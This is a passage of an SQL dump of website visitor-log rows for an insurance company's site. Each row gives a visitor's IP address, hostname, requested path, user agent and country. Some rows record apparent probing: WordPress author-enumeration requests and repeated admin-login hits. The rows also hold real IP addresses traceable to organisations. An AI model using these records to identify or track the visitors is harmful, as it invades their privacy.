9','','','','','','','','0','0',0),(21386,'0b_2708b22facca608c21d2a38e8b5a1f41','1461650623','130.185.155.82','130.185.155.82','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(21387,'0b_2708b22facca608c21d2a38e8b5a1f41','1461650634','130.185.155.82','130.185.155.82','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(21390,'0b_0b518cb10a37e94f808bad51a8793d1c','1461650979','141.8.143.235','spider-141-8-143-235.yandex.com','/case-status/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(21393,'0b_b7f9d586923ad922c86b29813f1cb26d','1461651348','192.227.211.57','192-227-211-57-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 39','us','','','','','','','0','0',0),(21395,'0b_cdadc0580ae14775f1727263cdf77956','1461654509','91.200.12.53','dedic658.hidehost.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:42.0) Gecko/20100101 Firefox/42.0','','',0,'MacOSX','Firefox 42','us','','','','','','','0','0',0),(21398,'0b_66ab550f91d4f6299abf165968c64d21','1461656419','122.53.108.98','host.3.static.charterpingan.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','us','1366 x 768','','','','','','0','0',0),(21399,'0b_66ab550f91d4f6299abf165968c64d21','1461656422','122.53.108.98','host.3.static.charterpingan.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 39','us','1366 x 768','','','','','','0','0',0),(21401,'0b_66ab550f91d4f6299abf165968c64d21','1461656434','122.53.108.98','host.3.static.charterpingan.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','us','1366 x 768','','','','','','0','0',0),(21402,'0b_66ab550f91d4f6299abf165968c64d21','1461656445','122.53.108.98','host.3.static.charterpingan.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 39','us','1366 x 768','','','','','','0','0',0),(21404,'0b_66ab550f91d4f6299abf165968c64d21','1461657008','122.53.108.98','host.3.static.charterpingan.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21405,'0b_66ab550f91d4f6299abf165968c64d21','1461657011','122.53.108.98','host.3.static.charterpingan.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21407,'0b_e6de1ab943300be53a13fac2d9ae1c93','1461657632','122.53.108.98','host.3.static.charterpingan.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21410,'0b_e6de1ab943300be53a13fac2d9ae1c93','1461657634','122.53.108.98','host.3.static.charterpingan.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21413,'0b_6e8578d7dbd9609638c342ca2c02a503','1461659036','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(21414,'0b_b05e499d64ab4107ddf080dd8601724c','1461659045','157.55.39.137','msnbot-157-55-39-137.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21416,'0b_ac48d7567a0bdd61dce97542121edece','1461659597','122.53.108.98','host.3.static.charterpingan.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21417,'0b_ac48d7567a0bdd61dce97542121edece','1461659599','122.53.108.98','host.3.static.charterpingan.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21419,'0b_f61f6e2e14bb89da87070c602488c3fa','1461659675','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21422,'0b_c55f69f2be22f4c29471f3f3b13a4d6e','1461660203','82.98.137.3','dl56.dinaserver.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(21425,'0b_d8051c4f06b8f1b7a4cd9208b21261fc','1461661080','157.55.39.177','msnbot-157-55-39-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(21428,'0b_ad39b6cc674e6a80769c3185eda8b94d','1461662934','122.53.108.98','host.3.static.charterpingan.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21429,'0b_ad39b6cc674e6a80769c3185eda8b94d','1461662936','122.53.108.98','host.3.static.charterpingan.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 39','us','','','','','','','0','0',0),(21431,'0b_0d5d6b30fb72f74b9bd5edb536bb8cfd','1461666918','180.76.15.14','baiduspider-180-76-15-14.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(21434,'0b_383309bf08dff694cd5f90b7f9b90520','1461669354','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(21437,'0b_11b472bbca0b2efc6680e69a87b8f262','1461671512','66.249.66.18','crawl-66-249-66-18.googlebot.com','/illustration.htm','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(21438,'0b_4963c237a66a7175aaec530053b4e68a','1461671994','68.64.168.250','houston.shortyusa4all.in','/administrator/index.php','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','in','','','','','','','3','0',0),(21440,'0b_4963c237a66a7175aaec530053b4e68a','1461671995','68.64.168.250','houston.shortyusa4all.in','/administrator/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','in','','','','','','','3','0',0),(21441,'0b_cecd61944498c4cd4bb0a44a5c60cc9a','1461672060','185.55.217.5','185.55.217.5','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinVista','Firefox 16','ua','','','','','','','0','0',0),(21444,'0b_cae862a9c7b8cd2aa9c82e5ebf03c011','1461673615','185.55.217.5','185.55.217.5','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','ua','','','','','','','0','0',0),(21446,'0b_9ac9f3818e5600156171497aaeef1f39','1461674034','157.55.39.137','msnbot-157-55-39-137.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(21449,'0b_9ac9f3818e5600156171497aaeef1f39','1461674036','157.55.39.137','msnbot-157-55-39-137.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(21452,'0b_31825a037ffb440948c41e5ebabe18ec','1461675136','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)','http://replicaclub.ru/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(21453,'0b_3aa9b85c9b7c960c3dd0fbf702a090f4','1461675136','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)','http://my-big-family.com/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(21456,'0b_364dcb184e32e69e1e7de0b9ddaad046','1461675521','52.53.242.233','ec2-52-53-242-233.us-west-1.compute.amazonaws.com','/?author=1','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50','','',0,'WinXP','Opera 9','ru','','','','','','','0','0',0),(21458,'0b_3e7e9d45485cd5b77d35167a89e52626','1461676183','185.55.217.5','185.55.217.5','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(21459,'0b_fdc26832678a21e8c52ccf56f2ea3d75','1461677304','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21461,'0b_022510eb54735242bdd710db7f481941','1461678486','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(21464,'0b_47fcc03e19c9bd748539ca1cd99f8b72','1461682476','70.124.137.219','cpe-70-124-137-219.austin.res.rr.com','/','Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG-SM-N915A Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36','','',0,'Android 5','SamsungBrowser 4','us','','','','','','','0','0',0),(21467,'0b_47fcc03e19c9bd748539ca1cd99f8b72','1461682479','70.124.137.219','cpe-70-124-137-219.austin.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG-SM-N915A Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 4','us','','','','','','','0','0',0),(21470,'0b_11e4f30267d666cfb8b24ac94482274f','1461683119','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21473,'0b_11e4f30267d666cfb8b24ac94482274f','1461683122','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21476,'0b_11e4f30267d666cfb8b24ac94482274f','1461683124','69.175.67.58','newscan04.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21477,'0b_11e4f30267d666cfb8b24ac94482274f','1461683127','69.175.67.58','newscan04.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21480,'0b_11e4f30267d666cfb8b24ac94482274f','1461683129','69.175.67.58','newscan04.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(21482,'0b_605837c2dd041d444a4443c778de2bc0','1461687786','52.53.175.12','ec2-52-53-175-12.us-west-1.compute.amazonaws.com','/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 SlimerJS/0.9.5','','',0,'Linux','SlimerJS 0.9','us','','','','','','','0','0',0),(21485,'0b_605837c2dd041d444a4443c778de2bc0','1461687788','52.53.175.12','ec2-52-53-175-12.us-west-1.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 SlimerJS/0.9.5','http://www.empireins.com/','',0,'Linux','SlimerJS 0.9','us','','','','','','','0','0',0),(21488,'0b_62f60e1b9d07be29be78e692a84d3819','1461690447','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21491,'0b_2c1f9d3d14be3759a8406b2f3538f5a8','1461692713','40.114.15.13','40.114.15.13','/','User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5','','',0,'WinXP','Firefox 3','us','','','','','','','0','0',0),(21494,'0b_2c1f9d3d14be3759a8406b2f3538f5a8','1461692724','40.114.15.13','40.114.15.13','/contact','User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5','','',0,'WinXP','Firefox 3','us','','','','','','','0','0',0),(21497,'0b_2c1f9d3d14be3759a8406b2f3538f5a8','1461692733','40.114.15.13','40.114.15.13','/contact/','User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5','','',0,'WinXP','Firefox 3','us','','','','','','','0','0',0),(21500,'0b_8f22007e98ec5ac34ed9f0dbae10ea8d','1461694546','180.76.15.21','baiduspider-180-76-15-21.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(21501,'0b_688f0c440a7c9337bb449b7af45ccac0','1461695125','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21503,'0b_e8b7135561785ab99c6d4cbd17c25960','1461695503','38.104.63.90','mail.emhllp.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1680 x 1050','Google','','','','','0','0',0),(21506,'0b_e8b7135561785ab99c6d4cbd17c25960','1461695505','38.104.63.90','mail.emhllp.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(21507,'0b_e8b7135561785ab99c6d4cbd17c25960','1461695512','38.104.63.90','mail.emhllp.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(21510,'0b_01a30bd430516bdd256fbb505474c03c','1461696339','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21513,'0b_f57baa8c91447a6bda9e977f57421f4d','1461696393','45.79.81.142','li1180-142.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(21516,'0b_a0c448a85ce9df0ba2294fa66f67fc98','1461696474','71.249.209.143','static-71-249-209-143.nycmny.east.verizon.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinXP','Chrome 49','us','1024 x 768','Google','','','','','0','0',0),(21519,'0b_a0c448a85ce9df0ba2294fa66f67fc98','1461696477','71.249.209.143','static-71-249-209-143.nycmny.east.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinXP','Chrome 49','us','1024 x 768','','','','','','0','0',0),(21521,'0b_a0c448a85ce9df0ba2294fa66f67fc98','1461696483','71.249.209.143','static-71-249-209-143.nycmny.east.verizon.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinXP','Chrome 49','us','1024 x 768','Google','','','','','0','51',0),(21524,'0b_a0c448a85ce9df0ba2294fa66f67fc98','1461696484','71.249.209.143','static-71-249-209-143.nycmny.east.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinXP','Chrome 49','us','1024 x 768','','','','','','0','0',0),(21525,'0b_a0c448a85ce9df0ba2294fa66f67fc98','1461696867','71.249.209.143','static-71-249-209-143.nycmny.east.verizon.net','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'WinXP','Chrome 49','us','1024 x 768','Google','','','','','0','51',0),(21528,'0b_a0c448a85ce9df0ba2294fa66f67fc98','1461696869','71.249.209.143','static-71-249-209-143.nycmny.east.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'WinXP','Chrome 49','us','1024 x 768','','','','','','0','0',0),(21531,'0b_e8b7135561785ab99c6d4cbd17c25960','1461696912','38.104.63.90','mail.emhllp.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1680 x 1050','Google','','','','','0','51',0),(21533,'0b_e8b7135561785ab99c6d4cbd17c25960','1461696914','38.104.63.90','mail.emhllp.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(21534,'0b_e8b7135561785ab99c6d4cbd17c25960','1461696918','38.104.63.90','mail.emhllp.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(21536,'0b_1c30aa023564e0fd577772addb89a31a','1461697721','66.249.73.196','crawl-66-249-73-196.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21537,'0b_1c30aa023564e0fd577772addb89a31a','1461697726','66.249.73.179','crawl-66-249-73-179.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21539,'0b_e8b7135561785ab99c6d4cbd17c25960','1461698117','38.104.63.90','mail.emhllp.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1680 x 1050','Google','','','','','0','51',0),(21542,'0b_e8b7135561785ab99c6d4cbd17c25960','1461698118','38.104.63.90','mail.emhllp.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','0',0),(21543,'0b_e8b7135561785ab99c6d4cbd17c25960','1461698122','38.104.63.90','mail.emhllp.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1680 x 1050','','','','','','0','51',0),(21546,'0b_dba7f162b7269b7f439411a50da48c94','1461701304','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(21549,'0b_dba7f162b7269b7f439411a50da48c94','1461701308','100.43.81.146','spider-100-43-81-146.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(21552,'0b_96dd768cf9ed30173b9555e452575103','1461701342','148.251.153.69','static.69.153.251.148.clients.your-server.de','/calc.html','WordPress/4.3.1; http://mortgageunpaid.com','','',0,'','','de','','','WordPress','','','','0','0',0),(21554,'0b_dd07d9806f78b87dbde388bf225ef676','1461703455','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21557,'0b_a6f04b4de8fe72cb168d60e5f0e278e0','1461704989','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21560,'0b_9dc04555469bd9455564afd340eaafbd','1461705612','178.255.215.70','crawl06.exabot.com','/insentives/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(21561,'0b_8c9f226eefbe445ffdc23541e007607b','1461709716','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21563,'0b_362584b9814c786c3ef861114a41640e','1461710624','178.255.215.70','crawl06.exabot.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(21564,'0b_f1cf9337f169e8dc2ca9894b86355c57','1461710751','208.115.111.66','208-115-111-66-reverse.wowrack.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21566,'0b_de593b93686c0af24c714baa2c55b517','1461714994','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Opera/8.00 (Windows NT 5.1; U; en)','http://www.hifidesign.ru/','',0,'WinXP','Opera 8','us','','','','','','','0','0',0),(21567,'0b_1538b04c5f6f4c0286db586ee08303bf','1461714994','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)','http://www.x720.net/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(21569,'0b_c06d49a31a6e35f878a3c234cd0f7863','1461716480','107.173.195.115','107-173-195-115-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.1985.97 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 36','us','','','','','','','0','0',0),(21572,'0b_f7733726196308e5d85cefdeabe9ea46','1461717041','66.249.73.194','crawl-66-249-73-194.googlebot.com','/illustration.htm','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(21573,'0b_f7733726196308e5d85cefdeabe9ea46','1461717134','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21575,'0b_7079ee56b0cdcc7fac83b005042f2d63','1461719473','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(21578,'0b_1dbc2a7131f519c160d675b18e7f0189','1461720259','130.185.155.10','130.185.155.10','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(21579,'0b_1dbc2a7131f519c160d675b18e7f0189','1461720269','130.185.155.10','130.185.155.10','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(21581,'0b_1dbc2a7131f519c160d675b18e7f0189','1461720280','130.185.155.10','130.185.155.10','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(21582,'0b_93bce6c06b5587a3dd56a4c8704e31f0','1461721026','180.76.15.12','baiduspider-180-76-15-12.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(21584,'0b_7aa86c6cac4c1b354ce3edb211d5dfe0','1461722818','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(21585,'0b_9839f748df23a0773e7aa8b82d626d7e','1461723505','157.55.39.22','msnbot-157-55-39-22.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(21587,'0b_2941afba34d62345e2ce89aa4e4945e5','1461723533','157.55.39.107','msnbot-157-55-39-107.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone 